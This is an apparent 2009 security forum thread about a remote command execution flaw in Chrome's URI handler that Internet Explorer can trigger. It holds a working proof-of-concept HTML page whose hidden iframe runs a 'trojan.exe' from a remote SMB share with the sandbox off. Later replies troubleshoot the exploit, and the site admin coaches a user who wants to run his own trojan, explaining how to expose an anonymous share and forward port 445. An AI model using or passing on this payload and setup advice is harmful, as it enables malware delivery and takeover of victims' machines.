|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
IE pwning Chrome :) |
|
Posted: Fri Jan 30, 2009 11:42 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Sat Jan 31, 2009 4:22 am |
|
|
Jetfirehack |
Regular user |
|
|
Joined: Jan 31, 2009 |
Posts: 6 |
Location: x |
|
|
|
|
|
|
I just tested this code locally in Chrome, but all that happens is a warning to launch an external application, and which when I click "launch" it opens up a new tab instead of calc, which I presume is what's supposed to be run upon approval :\ |
|
|
|
|
|
|
|
|
Posted: Sat Jan 31, 2009 1:42 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Jetfirehack wrote: | I just tested this code locally in Chrome, but all that happens is a warning to launch an external application, and which when I click "launch" it opens up a new tab instead of calc, which I presume is what's supposed to be run upon approval :\ |
It supposed to be opened in Internet Explorer
Just write that example html file, open with IE and watch the Calculator popping up. Real world attack scenario using SMB (Windows shares):
Code: |
<html><head><title>Chrome URI Handler Remote Command Execution PoC 2</title></head>
<body>
<h3>This is a test2</h3>
<iframe src='chromehtml:"%20--renderer-path="\\11.22.33.44\path\to\trojan.exe"%20--no-sandbox' width=0 height=0></iframe>
</body></html>
|
So for attack to be successul:
1. victim must have windows op system
2. Chrome must be installed
3. victim must visit malicious website with IE browser
4. firewall and other obstacles must let SMB to deliver the payload |
|
|
|
|
|
|
|
|
Posted: Sat Jan 31, 2009 7:35 pm |
|
|
9SttnsGrp |
Beginner |
|
|
Joined: Jan 31, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
Janek, did you know that rgod always loved you? However, we already knew that we are doing that to a lot of apps... most of them have undocumented switches, just investigating executables with PE Explorer.
btw, tnx for pointing attention to that solution |
|
|
|
|
Posted: Sat Jan 31, 2009 8:49 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Hi
Yes, this URI handler vulns stuff is widespread. I did some dig in history and there was issues allready from year 2002
I'm using IDA and other tools for reverse engineer and then analyzing commandline parsing - and yes, there is lots of hidden stuff ...
My another favorite area of research currently is ActiveX - many undocumented "features" waiting for abuse |
|
|
|
|
|
|
|
|
Posted: Sat Jan 31, 2009 9:09 pm |
|
|
Jetfirehack |
Regular user |
|
|
Joined: Jan 31, 2009 |
Posts: 6 |
Location: x |
|
|
|
|
|
|
Hmm, maybe it's just me because I just get an error with IE lolz.
The webpage cannot be displayed
Most likely cause:
Some content or files on this webpage require a program that you don't have installed.
What you can try:
Search online for a program you can use to view this web content.
Retype the address.
Go back to the previous page.
&& The URL would say:
chromehtml:"%20--renderer-path="\\11.22.33.44\path\to\trojan.exe"%20--no-sandbox
Which is pretty coool. |
|
|
|
|
Posted: Sat Jan 31, 2009 11:41 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
hehehhehe.Cool. |
|
|
|
|
Posted: Sat Jan 31, 2009 11:56 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Jetfirehack wrote: | Hmm, maybe it's just me because I just get an error with IE lolz.
The webpage cannot be displayed
Most likely cause:
Some content or files on this webpage require a program that you don't have installed.
What you can try:
Search online for a program you can use to view this web content.
Retype the address.
Go back to the previous page.
&& The URL would say:
chromehtml:"%20--renderer-path="\\11.22.33.44\path\to\trojan.exe"%20--no-sandbox
Which is pretty coool. |
You have Chrome installed, right? Try this in IE:
Does Chrome pop up or not? |
|
|
|
|
Posted: Sun Feb 01, 2009 3:27 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Nice |
|
|
|
|
Posted: Sun Feb 01, 2009 9:40 pm |
|
|
Jetfirehack |
Regular user |
|
|
Joined: Jan 31, 2009 |
Posts: 6 |
Location: x |
|
|
|
|
|
|
waraxe wrote: | Jetfirehack wrote: | Hmm, maybe it's just me because I just get an error with IE lolz.
The webpage cannot be displayed
Most likely cause:
Some content or files on this webpage require a program that you don't have installed.
What you can try:
Search online for a program you can use to view this web content.
Retype the address.
Go back to the previous page.
&& The URL would say:
chromehtml:"%20--renderer-path="\\11.22.33.44\path\to\trojan.exe"%20--no-sandbox
Which is pretty coool. |
You have Chrome installed, right? Try this in IE:
Does Chrome pop up or not? | Nope, nothing happens for me - and I have Chrome installed. |
|
|
|
|
Posted: Mon Feb 02, 2009 2:08 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Are you sure you have calc installed?
Works for me |
|
|
|
|
Posted: Mon Feb 02, 2009 12:15 pm |
|
|
johnnycannuk |
Beginner |
|
|
Joined: Feb 02, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
-AO- wrote: | Are you sure you have calc installed?
Works for me |
I definitely have calc installed and I'm getting the same error message - it doesn't matter whether I get it from a local file of served from a local web server.
Check you IE settings, maybe there is some setting you guys have that we don't/ My IE definitly doesn't know how to handle Chomehtml: |
|
|
|
|
Posted: Mon Feb 02, 2009 1:25 pm |
|
|
UXo |
Beginner |
|
|
Joined: Feb 02, 2009 |
Posts: 4 |
|
|
|
|
|
|
|
Waraxe , I need some help about the execution of an other file , I have try some test to check if it will poped or not , It doesn't working . .
Code: | chromehtml:"%20--renderer-path="\\URL.com\trojan.exe"%20--no-sandbox |
can I got a solution about this?, Thanks in advanced.
/UXe |
|
|
|
|
Posted: Mon Feb 02, 2009 1:47 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
johnnycannuk wrote: | -AO- wrote: | Are you sure you have calc installed?
Works for me |
I definitely have calc installed and I'm getting the same error message - it doesn't matter whether I get it from a local file of served from a local web server.
Check you IE settings, maybe there is some setting you guys have that we don't/ My IE definitly doesn't know how to handle Chomehtml: |
If "chromehtml:" in IE will not trigger Chrome, then you just don't have chrome URI handler installed to your system registry ... |
|
|
|
|
|
|
|
|
Posted: Mon Feb 02, 2009 1:50 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
UXo wrote: | Waraxe , I need some help about the execution of an other file , I have try some test to check if it will poped or not , It doesn't working . .
Code: | chromehtml:"%20--renderer-path="\\URL.com\trojan.exe"%20--no-sandbox |
can I got a solution about this?, Thanks in advanced.
/UXe |
This is not http protocol, it's SMB (windows shares). Attacker must use ip address to windows box with shares open to Internet. SMB port 445 must be not blocked by firewall, use port forwarding in router if needed. Share must be accessible anonymously, without credentials.
Have you tried local version with calc or cmd? Does it work locally? |
|
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|